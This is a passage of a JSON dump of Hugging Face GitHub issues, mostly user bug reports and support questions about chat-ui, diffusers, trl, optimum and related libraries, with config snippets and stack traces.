[], "created_at": "2024-08-08T08:30:33Z", "updated_at": "2024-11-26T02:11:03Z", "comments": 33, "user": "hznnnnnn" }, { "repo": "huggingface/diffusers", "number": 9120, "title": "[ar] Translating docs to Arabic (\u0627\u0644\u0639\u0631\u0628\u064a\u0629)", "body": "\r\n\r\nHi!\r\n\r\nLet's bring the documentation to all the -speaking community \ud83c\udf10.\r\n\r\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/diffusers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. 
Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\r\n\nSome notes:\r\n\r\n* Please translate using an informal tone (imagine you are talking with a friend about Diffusers \ud83e\udd17).\r\n* Please translate in a gender-neutral way.\r\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/diffusers/tree/main/docs/source).\r\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/diffusers/blob/main/docs/source/en/_toctree.yml).\r\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. Please ping @stevhliu for review.\r\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/c/discussion-related-to-httpsgithubcomhuggingfacediffusers/63).\r\n\r\nThank you so much for your help! \ud83e\udd17\r\n", "url": "https://github.com/huggingface/diffusers/issues/9120", "state": "closed", "labels": [], "created_at": "2024-08-07T21:04:54Z", "updated_at": "2024-10-29T08:14:24Z", "comments": 2, "user": "AhmedAlmaghz" }, { "repo": "huggingface/chat-ui", "number": 1394, "title": "I need to reload to get the response", "body": "![image](https://github.com/user-attachments/assets/7f7ec4b0-7978-468e-b793-d460d528ba84)\r\nI am using LLama 3.1 70B to chat, but it is very slow to get a response and I need to reload the page to get the response. Is it because the model is overloaded?", "url": "https://github.com/huggingface/chat-ui/issues/1394", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-07T09:31:03Z", "updated_at": "2024-08-15T06:56:59Z", "comments": 2, "user": "renaldy-therry" }, { "repo": "huggingface/chat-ui", "number": 1393, "title": "Generation Error with Ollama - Inconsistent Output Generation", "body": "Hi,\r\n\r\nI'm experiencing issues while running GEMMA2 on Ollama.
Specifically, I'm encountering the following problems:\r\n\r\nError on Message Generation:\r\n Whenever a new chat is created, every message results in the error:\r\n\r\n Error: Generation failed, in the back end\r\n\r\n No output is generated,on the front end.\r\n\r\nInconsistent Message Handling:\r\n After retrying the same message multiple times (ranging from 2 to 15 attempts), the message is eventually processed correctly and the output is displayed on the front end.\r\n\r\nServer Responsiveness:\r\n Despite the above issues, the server responds to every query.\r\n\r\nExpected Behavior:\r\nMessages should be processed and output generated on the first attempt without errors.\r\n\r\nAdditional Context:\r\n\r\n Ollama Version: 0.3.3\r\n GEMMA2:2b (I've tried others models and the problem is the same)\r\n Operating System: CentOS\r\nRelevant Logs:\r\nerror message: \r\n\r\n ERROR (537688): Generation failed\r\n err: {\r\n \"type\": \"Error\",\r\n \"message\": \"Generation failed\",\r\n \"stack\":\r\n Error: Generation failed\r\n at Module.generateFromDefaultEndpoint (/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:23:9)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async generateTitle (/chat-ui/src/lib/server/textGeneration/title.ts:54:10)\r\n at async Module.generateTitleForConversation (/chat-ui/src/lib/server/textGeneration/title.ts:17:19)\r\n\r\nIts something with the title of the conversation but retrying the message finally the conversations name is changed too. And messages after conversations name is changed have the same problem, rarely it works at first attempt.\r\n\r\nMy env.local:\r\n\r\n MONGODB_URL=\"mongodb://localhost:27017\"\r\n HF_TOKEN=Mytoken\r\n OPENAI_API_KEY=\"ollama\"\r\n MODELS=`[\r\n {\r\n \"name\": \"google/gemma-2-2b-it\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}user\\n{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}\\nmodel\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"baseURL\": \"http://127.0.0.1:11434\",\r\n \"ollamaName\" : \"gemma2:2b\"\r\n }\r\n ]\r\n },\r\n ]`\r\n \r\n USE_LOCAL_WEBSEARCH=true\r\n\r\n\r\n\r\nAny assistance in resolving this issue would be greatly appreciated. 
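The trace in chat-ui #1393 above fails inside `generateTitle`, not the chat response itself. chat-ui exposes a `TASK_MODEL` setting in `.env.local` for such internal tasks; pointing it at the working model is a low-risk experiment (hedged: whether it removes the retries depends on why the default task endpoint fails):

```
# .env.local — route internal tasks (e.g. conversation titles) to the model
# that is known to respond; the value must match a "name" from MODELS.
TASK_MODEL="google/gemma-2-2b-it"
```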
Thank you!", "url": "https://github.com/huggingface/chat-ui/issues/1393", "state": "open", "labels": [ "support" ], "created_at": "2024-08-07T09:02:19Z", "updated_at": "2024-08-07T11:05:19Z", "comments": 1, "user": "juanjuanignacio" }, { "repo": "huggingface/chat-ui", "number": 1392, "title": "Cannot send the message and get response in hugging chat", "body": "I cannot send message and get a response from llm, and i cannot click \"activate\" to change model in huggingchat (https://huggingface.co/chat/)", "url": "https://github.com/huggingface/chat-ui/issues/1392", "state": "closed", "labels": [ "support", "huggingchat" ], "created_at": "2024-08-07T08:37:01Z", "updated_at": "2024-08-07T09:06:59Z", "comments": 4, "user": "renaldy-therry" }, { "repo": "huggingface/text-embeddings-inference", "number": 371, "title": "how to support a SequenceClassification model", "body": "### Feature request\r\n\r\nI have a model can be run by transformers.AutoModelForSequenceClassification.from_pretrained, how can i serve it in TEI\r\n\r\n### Motivation\r\n\r\nto support more models\r\n\r\n### Your contribution\r\n\r\nYES", "url": "https://github.com/huggingface/text-embeddings-inference/issues/371", "state": "closed", "labels": [], "created_at": "2024-08-06T10:45:00Z", "updated_at": "2024-10-17T10:24:09Z", "user": "homily707" }, { "repo": "huggingface/chat-ui", "number": 1387, "title": "CopyToClipBoardBtn in ChatMessage.svelte has a bug?", "body": "https://github.com/huggingface/chat-ui/blob/6de97af071c69aa16e8f893adebb46f86bdeeaff/src/lib/components/chat/ChatMessage.svelte#L378-L384\r\n\r\nWhen compared to other components, classNames is the only difference here.\r\nWhen rendered, the icon appears faint in the browser.\r\nIs there a reason for this, or is it a bug?\r\n\r\nhttps://github.com/huggingface/chat-ui/blob/6de97af071c69aa16e8f893adebb46f86bdeeaff/src/lib/components/CopyToClipBoardBtn.svelte#L37-L51\r\n\r\nIt seems that the classNames of IconCopy is the cause of the faintness.", "url": "https://github.com/huggingface/chat-ui/issues/1387", "state": "closed", "labels": [ "bug", "good first issue", "front" ], "created_at": "2024-08-06T04:59:45Z", "updated_at": "2024-08-12T09:35:21Z", "comments": 5, "user": "calycekr" }, { "repo": "huggingface/diffusers", "number": 9092, "title": "Fluxpipeline report model_index.json not found", "body": "### Describe the bug\r\n\r\nI use the Fluxpipeline and report no file model_index.json.\r\nI read other issue and set the `revision=\"refs/pr/3\"`,but it doesn't work, how can i do to solve this problem and how to use the T5xxl as text encoder? 
thanks for your help\r\n\r\n### Reproduction\r\n\r\n```\r\nimport torch\r\nfrom diffusers import FluxPipeline\r\n\r\npipe = FluxPipeline.from_pretrained(\"/opt/ml/volume/default/aigc/project/chanPin/models/flux\", revision=\"refs/pr/3\",torch_dtype=torch.bfloat16)\r\npipe.enable_model_cpu_offload()\r\n\r\nprompt = \"a tiny astronaut hatching from an egg on the moon\"\r\nout = pipe(\r\n prompt=prompt, \r\n guidance_scale=3.5, \r\n height=768, \r\n width=1360, \r\n num_inference_steps=50,\r\n).images[0]\r\nout.save(\"image.png\")\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nubuntu 20.04\r\n\r\n### Who can help?\r\n\r\n@sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/9092", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-06T01:48:40Z", "updated_at": "2024-08-06T02:25:03Z", "comments": 3, "user": "chongxian" }, { "repo": "huggingface/trl", "number": 1900, "title": "How to speed up PPOTrainer .generate()?", "body": "During PPO, I'm finding that `.generate()` is extremely slow. The following call takes ~3 and a half minutes for batch size of 64 with a 1.4B parameter policy LM:\r\n\r\n```\r\nppo_trainer.generate(\r\n input_token_ids_list,\r\n pad_token_id=policy_model_tokenizer.eos_token_id,\r\n return_prompt=False,\r\n **generation_config_dict,\r\n )\r\n```\r\n\r\nHow can I accelerate sampling? The same function call with `vllm` takes <30s for setup and execution, so I feel like I am doing something suboptimally.", "url": "https://github.com/huggingface/trl/issues/1900", "state": "closed", "labels": [], "created_at": "2024-08-05T18:35:31Z", "updated_at": "2024-10-01T06:35:50Z", "user": "RylanSchaeffer" }, { "repo": "huggingface/chat-ui", "number": 1386, "title": "System role problem running Gemma 2 on vLLM", "body": "Hello,\r\n\r\nIn running chat ui and trying some models, with phi3 and llama i had no problem but when I run gemma2 in vllm Im not able to make any good api request,\r\nin env.local:\r\n{\r\n \"name\": \"google/gemma-2-2b-it\",\r\n \"id\": \"google/gemma-2-2b-it\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}user\\n{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}\\nmodel\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"openai\",\r\n \"baseURL\": \"http://127.0.0.1:8000/v1\",\r\n \r\n }\r\n ]\r\n\r\n}\r\n\r\nand I always have the same response in vllm server:\r\n\r\nERROR 08-05 12:39:06 serving_chat.py:118] Error in applying chat template from request: System role not supported\r\nINFO: 127.0.0.1:42142 - \"POST /v1/chat/completions HTTP/1.1\" 400 Bad Request\r\n\r\ndo someone know if I have to change and how do change the chat template or deactivate system role ? 
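Returning to the `PPOTrainer.generate` speed question above (trl #1900): before switching to vLLM, two levers that usually matter are the `batch_size` argument of `generate` (it chunks the queries internally) and a hard cap on `max_new_tokens`. A sketch reusing the issue's variable names:

```python
generation_kwargs = {
    "max_new_tokens": 64,  # capping rollout length is the biggest latency lever
    "do_sample": True,
    "top_k": 0,
    "top_p": 1.0,
    "pad_token_id": policy_model_tokenizer.eos_token_id,
}

responses = ppo_trainer.generate(
    input_token_ids_list,
    return_prompt=False,
    batch_size=32,  # generate() chunks the 64 queries internally; tune to VRAM
    **generation_kwargs,
)
```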
is it a vllm problem or a chat ui problem?\r\n\r\nThank U!", "url": "https://github.com/huggingface/chat-ui/issues/1386", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-05T13:22:10Z", "updated_at": "2024-11-07T21:39:47Z", "comments": 5, "user": "juanjuanignacio" }, { "repo": "huggingface/optimum", "number": 1981, "title": " [GPTQQuantizer] How to use multi-GPU for GPTQQuantizer?", "body": "### System Info\r\n\r\n```shell\r\nhello\uff1a\r\nI encountered an out-of-memory error while attempting to quantize a model using GPTQQuantizer. The error seems to be related to the large size of the model weights. Below is the quantization code I used:\r\n\r\nfrom optimum.gptq import GPTQQuantizer\r\n\r\nquantizer = GPTQQuantizer(\r\n bits=4,\r\n dataset='wikitext2',\r\n block_name_to_quantize=decoder.layers,\r\n disable_exllama=False,\r\n damp_percent=0.1,\r\n group_size=128\r\n)\r\n\r\nThe error message I received is as follows:\r\ntorch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 784.00 MiB. GPU 0 has a total capacty of 10.90 GiB of which 770.44 MiB is free. Including non-PyTorch memory\r\n\r\nEnvironment:\r\n\u00b7 Transformers version: 4.43.2\r\n\u00b7 Optimum version: 1.21.2\r\n\u00b7 GPU model and memory: 11GiB * 2\r\n\u00b7 CUDA version: 12.4\r\nQuestion:How to use multi-GPU for GPTQQuantizer? thank you!\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@kashif @srush @danieldk @mausch @dmaniloff How to use multi-GPU for GPTQQuantizer?\r\n\r\n### Information\r\n\r\n- [x] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nfrom optimum.gptq import GPTQQuantizer\r\n```python\r\nquantizer = GPTQQuantizer(\r\n bits=4,\r\n dataset='wikitext2',\r\n block_name_to_quantize=decoder.layers,\r\n disable_exllama=False,\r\n damp_percent=0.1,\r\n group_size=128\r\n)\r\n```\r\n\r\n### Expected behavior\r\n\r\nuse multi-GPU for GPTQQuantizer?", "url": "https://github.com/huggingface/optimum/issues/1981", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-05T07:58:11Z", "updated_at": "2024-08-08T02:19:18Z", "user": "RunTian1" }, { "repo": "huggingface/datasets", "number": 7087, "title": "Unable to create dataset card for Lushootseed language", "body": "### Feature request\n\nWhile I was creating the dataset which contained all documents from the Lushootseed Wikipedia, the dataset card asked me to enter which language the dataset was in. Since Lushootseed is a critically endangered language, it was not available as one of the options. Is it possible to allow entering languages that aren't available in the options?\n\n### Motivation\n\nI'd like to add more information about my dataset in the dataset card, and the language is one of the most important pieces of information, since the entire dataset is primarily concerned collecting Lushootseed documents.\n\n### Your contribution\n\nI can submit a pull request", "url": "https://github.com/huggingface/datasets/issues/7087", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-08-04T14:27:04Z", "updated_at": "2024-08-06T06:59:23Z", "comments": 2, "user": "vaishnavsudarshan" }, { "repo": "huggingface/diffusers", "number": 9076, "title": "Add a better version of 'callback_on_step_end' for FluxPipeline", "body": "**Is your feature request related to a problem? 
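For the multi-GPU GPTQ question above (optimum #1981), the usual pattern is to shard the fp16 model across the GPUs with `device_map="auto"` plus a `max_memory` budget before handing it to the quantizer. A hedged sketch — the memory caps are illustrative, and multi-GPU quantization behavior depends on the optimum version:

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
from optimum.gptq import GPTQQuantizer

model_id = "your-model-id"  # placeholder
tokenizer = AutoTokenizer.from_pretrained(model_id)

# Shard the fp16 weights over both 11 GiB cards, leaving headroom for the
# quantization buffers that triggered the original OOM.
model = AutoModelForCausalLM.from_pretrained(
    model_id,
    torch_dtype=torch.float16,
    device_map="auto",
    max_memory={0: "9GiB", 1: "9GiB", "cpu": "48GiB"},
)

quantizer = GPTQQuantizer(
    bits=4, dataset="wikitext2", group_size=128, damp_percent=0.1
)
quantized_model = quantizer.quantize_model(model, tokenizer)
quantizer.save(quantized_model, "model-gptq-4bit")
```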
Please describe.**\r\nThere is a huge delay before starting the inference and once the 4th step is complete and there is no callback for that and it feels like it is stuck, just want a more responsive version.\r\n```\r\nprompt = \"A cat holding a sign that says hello world\"\r\nimage = pipe(\r\n prompt,\r\n guidance_scale=0.0,\r\n output_type=\"pil\",\r\n num_inference_steps=4,\r\n max_sequence_length=256,\r\n generator=torch.Generator(\"cuda\").manual_seed(0)\r\n).images[0]\r\nprint('started saving file')\r\nimage.save(\"flux-schnell.png\")\r\n```\r\nIf you run the above code, it feels like you are stuck at step 0 and then after 4/4 is done\r\nI am using a 48GB A40\r\n\r\n**Describe the solution you'd like.**\r\nCan we get some kind of callback for these two delays as well\r\n", "url": "https://github.com/huggingface/diffusers/issues/9076", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-04T10:34:04Z", "updated_at": "2024-11-23T00:24:14Z", "comments": 3, "user": "nayan-dhabarde" }, { "repo": "huggingface/diffusers", "number": 9069, "title": "TypeError: expected np.ndarray (got numpy.ndarray)", "body": "### Describe the bug\r\n\r\n``` \r\nimport torch\r\nfrom diffusers import FluxPipeline\r\npipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\npipe.to(\"cuda\")\r\nprompt = \"A cat holding a sign that says hello world\"\r\n# Depending on the variant being used, the pipeline call will slightly vary.\r\n# Refer to the pipeline documentation for more details.\r\nimage = pipe(prompt, num_inference_steps=4, guidance_scale=0.0).images[0]\r\nimage.save(\"flux.png\")\r\n ```\r\n with this code, it report the error as following:\r\n```\r\n (flux) xiangyu@gpu06:~/st/flux$ python gen.py \r\nLoading pipeline components...: 0%| | 0/7 [00:00\r\n pipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 876, in from_pretrained\r\n loaded_sub_model = load_sub_model(\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 700, in load_sub_model\r\n loaded_sub_model = load_method(os.path.join(cached_folder, name), **loading_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_utils.py\", line 157, in from_pretrained\r\n return cls.from_config(config, return_unused_kwargs=return_unused_kwargs, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 260, in from_config\r\n model = cls(**init_dict)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 653, in inner_init\r\n init(self, *args, **init_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_flow_match_euler_discrete.py\", line 76, in __init__\r\n timesteps = torch.from_numpy(timesteps).to(dtype=torch.float32)\r\nTypeError: expected np.ndarray (got 
numpy.ndarray)\r\n```\r\n\r\n### Reproduction\r\n```python\r\nimport torch\r\nfrom diffusers import FluxPipeline\r\npipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\npipe.to(\"cuda\")\r\nprompt = \"A cat holding a sign that says hello world\"\r\n# Depending on the variant being used, the pipeline call will slightly vary.\r\n# Refer to the pipeline documentation for more details.\r\nimage = pipe(prompt, num_inference_steps=4, guidance_scale=0.0).images[0]\r\nimage.save(\"flux.png\")\r\n ```\r\n with this code, it report the error as following:\r\n (flux) xiangyu@gpu06:~/st/flux$ python gen.py \r\nLoading pipeline components...: 0%| | 0/7 [00:00\r\n pipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 876, in from_pretrained\r\n loaded_sub_model = load_sub_model(\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 700, in load_sub_model\r\n loaded_sub_model = load_method(os.path.join(cached_folder, name), **loading_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_utils.py\", line 157, in from_pretrained\r\n return cls.from_config(config, return_unused_kwargs=return_unused_kwargs, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 260, in from_config\r\n model = cls(**init_dict)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 653, in inner_init\r\n init(self, *args, **init_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_flow_match_euler_discrete.py\", line 76, in __init__\r\n ti", "url": "https://github.com/huggingface/diffusers/issues/9069", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-03T12:45:03Z", "updated_at": "2024-10-27T06:43:32Z", "comments": 11, "user": "xiangyumou" }, { "repo": "huggingface/evaluate", "number": 611, "title": "How to customize my own evaluator and metrics?", "body": "I'm facing a task on VQA, where I need to compute [VQA](https://visualqa.org/evaluation.html) accuracy](https://visualqa.org/evaluation.html) as follows:\r\n```math\r\n\\text{Acc}(ans) = \\min{ \\left\\{ \\frac{\\text{\\# humans that said } ans }{3}, 1 \\right\\} }\r\n```\r\nI have following questions:\r\n1. Do I need to customize my own metric? If so, can I only create `metrics/vqa_accuracy/vqa_accuracy.py` without other operations, such as running `evaluate-cli create \"accuracy name\" --module_type \"metric\"`?\r\n2. 
I found that there is no suitable `evaluator` for my task, and I'm not sure if it is possible to customize my own `evaluator`, since I didn't find any document on creating new `evaluator`.", "url": "https://github.com/huggingface/evaluate/issues/611", "state": "closed", "labels": [], "created_at": "2024-08-02T08:37:47Z", "updated_at": "2024-08-15T02:26:30Z", "user": "Kamichanw" }, { "repo": "huggingface/diffusers", "number": 9055, "title": "ImportError: cannot import name 'StableDiffusionLoraLoaderMixin' from 'diffusers.loaders'", "body": "### Describe the bug\n\nI get this error in diffusers versions 25,26,27,28,29, how can I solve it?\n\n### Reproduction\n\n\r\nimport ast\r\nimport gc\r\nimport inspect\r\nimport math\r\nimport warnings\r\nfrom collections.abc import Iterable\r\nfrom typing import Any, Callable, Dict, List, Optional, Union\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom packaging import version\r\nfrom transformers import CLIPImageProcessor, CLIPTextModel, CLIPTokenizer, CLIPVisionModelWithProjection\r\n\r\nfrom diffusers.configuration_utils import FrozenDict\r\nfrom diffusers.image_processor import PipelineImageInput, VaeImageProcessor\r\nfrom diffusers.loaders import (\r\n FromSingleFileMixin,\r\n IPAdapterMixin,\r\n StableDiffusionLoraLoaderMixin,\r\n TextualInversionLoaderMixin,\r\n)\r\nfrom diffusers.models import AutoencoderKL, UNet2DConditionModel\r\nfrom diffusers.models.attention import Attention, GatedSelfAttentionDense\r\nfrom diffusers.models.attention_processor import AttnProcessor2_0\r\nfrom diffusers.models.lora import adjust_lora_scale_text_encoder\r\nfrom diffusers.pipelines import DiffusionPipeline\r\nfrom diffusers.pipelines.pipeline_utils import StableDiffusionMixin\r\nfrom diffusers.pipelines.stable_diffusion.pipeline_output import StableDiffusionPipelineOutput\r\nfrom diffusers.pipelines.stable_diffusion.safety_checker import StableDiffusionSafetyChecker\r\nfrom diffusers.schedulers import KarrasDiffusionSchedulers\r\nfrom diffusers.utils import (\r\n USE_PEFT_BACKEND,\r\n deprecate,\r\n logging,\r\n replace_example_docstring,\r\n scale_lora_layers,\r\n unscale_lora_layers,\r\n)\r\nfrom diffusers.utils.torch_utils import randn_tensor\r\n\n\n### Logs\n\n```shell\nTraceback (most recent call last):\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/workspace/llm_sd.py\", line 149, in \r\n llm_sd(args=args)\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/workspace/llm_sd.py\", line 10, in llm_sd\r\n pipe = DiffusionPipeline.from_pretrained(\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 1147, in from_pretrained\r\n pipeline_class = _get_pipeline_class(\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 380, in _get_pipeline_class\r\n return get_class_from_dynamic_module(\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/utils/dynamic_modules_utils.py\", line 452, in get_class_from_dynamic_module\r\n return 
get_class_in_module(class_name, final_module.replace(\".py\", \"\"))\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/utils/dynamic_modules_utils.py\", line 164, in get_class_in_module\r\n module = importlib.import_module(module_path)\r\n File \"/usr/lib/python3.10/importlib/__init__.py\", line 126, in import_module\r\n return _bootstrap._gcd_import(name[level:], package, level)\r\n File \"\", line 1050, in _gcd_import\r\n File \"\", line 1027, in _find_and_load\r\n File \"\", line 1006, in _find_and_load_unlocked\r\n File \"\", line 688, in _load_unlocked\r\n File \"\", line 883, in exec_module\r\n File \"\", line 241, in _call_with_frames_removed\r\n File \"/home/wrusr/.cache/huggingface/modules/diffusers_modules/git/llm_grounded_diffusion.py\", line 32, in \r\n from diffusers.loaders import (\r\nImportError: cannot import name 'StableDiffusionLoraLoaderMixin' from 'diffusers.loaders' (/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/loaders/__init__.py)\n```\n\n\n### System Info\n\ntorch==2.0.1\r\ntorchvision==0.15.2\r\ntorchaudio==2.0.2\r\naccelerate==0.21.0\r\ntransformers==4.39.3\r\ndiffusers==0.27.2\r\npeft==0.10.0\r\nnumpy==1.25.2\r\npython3.10\n\n### Who can help?\n\n@yiyixuxu @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9055", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-02T07:58:16Z", "updated_at": "2024-08-02T09:32:12Z", "comments": 2, "user": "MehmetcanTozlu" }, { "repo": "huggingface/optimum", "number": 1980, "title": "Issue converting moss-moon-003-sft-int4 model to ONNX format", "body": "### System Info\n\n```shell\nI've been working with the owlv2 model and have encountered an issue while attempting to convert it into ONNX format using the provided command:\r\noptimum-cli export onnx --task text-generation -m\"/HDD/cz/tools/moss/\" --trust-remote-code \"HDD/cz/moss_onnx/\"\r\nUnfortunately, I'm facing the following error:\r\nTrying to export a moss model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`.\r\nAs I am relatively new to this process, I'm unsure about the necessity and usage of custom ONNX configuration. Could you please provide some guidance on how to address this issue? 
Any assistance or insights would be greatly appreciated.\r\n\r\nThank you for your attention to this matter.\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nhttps://huggingface.co/fnlp/moss-moon-003-sft-int4/tree/main\n\n### Expected behavior\n\nConvert the model to onnx format", "url": "https://github.com/huggingface/optimum/issues/1980", "state": "open", "labels": [ "bug", "onnx" ], "created_at": "2024-08-02T01:18:46Z", "updated_at": "2024-10-08T15:51:12Z", "comments": 0, "user": "ZhiChengWHU" }, { "repo": "huggingface/transformers", "number": 32376, "title": "AutoModel how to modify config?", "body": "```\r\nconfig = AutoConfig.from_pretrained(\r\n **self.params, trust_remote_code=True\r\n )\r\n config.vision_config.use_flash_attn = False\r\n print(config.vision_config)\r\n self.model = AutoModel.from_pretrained(\r\n **self.params, trust_remote_code=True, config=config\r\n ).eval()\r\n```\r\n\r\nI need disable `use_flash_attn ` to False forcely when loading a model from pretrained. But looks like the config set didn't have any effect.\r\n\r\nWhy and how", "url": "https://github.com/huggingface/transformers/issues/32376", "state": "closed", "labels": [], "created_at": "2024-08-01T12:40:44Z", "updated_at": "2024-08-02T02:30:22Z", "user": "lucasjinreal" }, { "repo": "huggingface/diffusers", "number": 9039, "title": "how to load_lora_weights in FlaxStableDiffusionPipeline", "body": "### Describe the bug\n\nhow to load lora in FlaxStableDiffusionPipeline, there are no load_lora_weights in FlaxStableDiffusionPipeline\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9039", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T11:23:52Z", "updated_at": "2024-10-15T03:23:54Z", "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 9038, "title": "how to use prompt weight in FlaxStableDiffusionPipeline", "body": "### Describe the bug\n\nI can see there are prompt_embeds in StableDiffusionPipeline to support Prompt weighting, But how to do that in FlaxStableDiffusionPipeline? there are not prompt_embeds in StableDiffusionPipeline\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9038", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T10:44:37Z", 